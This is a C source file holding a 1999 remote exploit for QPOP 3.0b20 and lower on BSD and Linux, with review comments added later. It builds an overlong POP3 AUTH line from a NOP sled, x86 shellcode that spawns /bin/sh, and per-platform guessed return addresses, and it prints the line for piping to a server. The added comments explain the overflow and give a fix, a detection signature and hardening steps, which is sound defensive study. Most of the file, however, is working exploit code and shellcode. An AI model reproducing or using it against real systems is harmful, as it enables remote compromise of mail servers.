/* QPOP version 3.0b20 and lower beta versions REMOTE EXPLOIT
 * combination *BSD and Linux
 *
 * sk8@lucid-solutions.com
 * http://www.lucid-solutions.com
 *
 * I have written this to test and demonstrate vulnerabilities on clients'
 * systems only.
 *
 * !!!!!!!!!!DO NOT distribute!!!!!!!!!!
 * (at least not until Qualcomm issues a patch)
 *
 * You may only use this to test your own system(s).
 * I am not responsible for any unauthorized use of this program.
 *
 * tested on BSDI 3.0/4.0.1, FreeBSD 2.2.8/3.3, Linux
 *
 * Since popper is usually compiled by the admin, return addresses will vary,
 * but I have included common values. You may have to provide an offset
 * to get it to work on your system.
 *
 * I wrote the exploit near the beginning of November 1999, and unlike some
 * other exploits I've seen since, this one works even on Linux boxes on which
 * inetd was not started from a shell prompt.
 *
 * Usage: If you can't figure out how to use this, you shouldn't
 * be in the security business. (try netcat)
 */

/*
 * NOTE(review): archived proof-of-concept, reviewed here as a study artefact
 * for defenders rather than as a tool.
 *
 * What the program does (all visible below): it builds a single POP3 line
 * beginning with "AUTH " whose total length is taken from a per-platform
 * table (1001 or 990 bytes), fills it with 0x90 bytes (the x86 `nop` opcode,
 * hence the name NOP), copies a platform-specific machine-code string
 * containing "/bin/sh" at offset 800, repeats a guessed address 4 bytes at a
 * time after it, and prints the result to stdout. It never opens a socket
 * itself -- the sockaddr_in/hostent locals are unused -- so the output is
 * meant to be piped at a server by hand ("try netcat").
 *
 * Why it works (inferred from the table, not shown here): the server
 * presumably copies the AUTH argument into a fixed-size stack buffer without
 * a length check, so the repeated address overwrites a saved return address.
 *
 * Defensive takeaways:
 *  - Fix: bound the copy of every command argument to the destination size,
 *    or run a patched popper release; the header above says the author was
 *    waiting for a vendor patch.
 *  - Detection: an AUTH command with a ~1 KB argument consisting mostly of
 *    0x90 bytes and containing "/bin/sh" is a straightforward IDS signature;
 *    legitimate AUTH arguments are short mechanism names.
 *  - Hardening: the hard-coded return addresses in verlist assume a fixed
 *    stack layout, so stack randomisation breaks them, and a non-executable
 *    stack prevents the injected code from running at all.
 */

/* Header names were lost in extraction (angle brackets stripped); the
 * original presumably pulled in the usual stdio/stdlib/string/socket
 * headers -- unknown from this copy. */
#include
#include
#include
#include
#include
#include
#include
#include

/* Filler byte for the whole buffer: 0x90, the x86 single-byte `nop`.
 * Declared as unsigned int but only its low byte reaches memset(). */
unsigned int NOP=0x90;

/* Added to the table address before it is written into the buffer;
 * overridable from argv[2]. */
unsigned long offset=0; /* default offset */

/* Machine code for the BSD targets in verlist. Not decoded here; the only
 * readable part is the embedded "/bin/sh" string. */
char bsdsc[]=
"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
"\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e"
"\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
"\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff"
"\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
"\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";

/* Machine code for the Linux entry in verlist; same remark as bsdsc. */
char linuxsc[]=
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
"\xff\xff/bin/sh";

/* One row of the target table. */
struct version {
    int num;            /* index shown in the usage listing */
    char* systype;      /* human-readable platform name; NULL terminates the table */
    int buffer_length;  /* total bytes of the AUTH line to emit */
    long address;       /* guessed stack address repeated after the payload */
};

/* Target table; the all-zero row is the sentinel the usage loop stops on. */
struct version verlist[] = {
    { 0, "BSDI 2.x/3.x, FreeBSD 2.x", 1001, 0xefbfd56c },
    {1, "BSDI 4.x", 1001, 0x8047564},
    {2, "FreeBSD 3.x", 1001, 0xbfbfd3dc},
    {3, "Linux", 990, 0xbfffd304},
    {0, 0, 0, 0}
};

/*
 * Entry point.
 *
 * argv[1]  index into verlist (not range-checked)
 * argv[2]  optional decimal offset added to the table address
 *
 * Prints the assembled line to stdout and returns 0; exits with -1 and a
 * usage listing when argv[1] is missing.
 */
int main(int argc, char** argv)
{
    char* buffer, *shellcode;
    int buflen, i=0, ver, retaddr, align=0;
    struct sockaddr_in sockaddr;   /* unused: no socket is ever opened */
    struct hostent* host;          /* unused */

    if (argc < 2) {
        printf("Usage: %s version [offset]\n", argv[0]);
        i=-1;   /* pre-increment in the loop below starts at row 0 */
        printf("\nAvailable versions:\n");
        while (verlist[++i].systype) {
            printf(" %d: %s\n", verlist[i].num, verlist[i].systype);
        }
        printf("\n");
        exit(-1);
    }

    ver=atoi(argv[1]);
    if (argc > 2) {
        offset=atoi(argv[2]);
    }

    /* Payload and alignment are chosen by the platform name alone. */
    if (strstr(verlist[ver].systype, "Linux")) {
        shellcode=linuxsc;
        align=2;
    } else shellcode=bsdsc;

    buflen=verlist[ver].buffer_length;
    retaddr=verlist[ver].address;   /* long narrowed into int */

    /* Whole line starts as 0x90 filler; malloc result is not checked. */
    buffer=(char*)malloc(buflen);
    memset(buffer, NOP, buflen);
    memcpy(buffer, "AUTH ", 5);
    memcpy(buffer+800, shellcode, strlen(shellcode));

    /* From just past the payload to 4 bytes before the end, write the
     * address in 4-byte steps through an unsigned long pointer. This
     * assumes a 32-bit unsigned long and tolerates unaligned stores;
     * on an LP64 host each store would be 8 bytes and overlap the next. */
    for (i=800+strlen(shellcode)+align; i< buflen-4; i+=4) {
        *((unsigned long int *)&buffer[i])=retaddr+offset;
    }

    buffer[buflen-2]='\n';
    buffer[buflen-1]='\n';

    /* buffer is never NUL-terminated, so "%s" reads past the allocation
     * until it happens to hit a zero byte. */
    printf("%s\n", buffer);
}
/* www.hack.co.za [2000]*/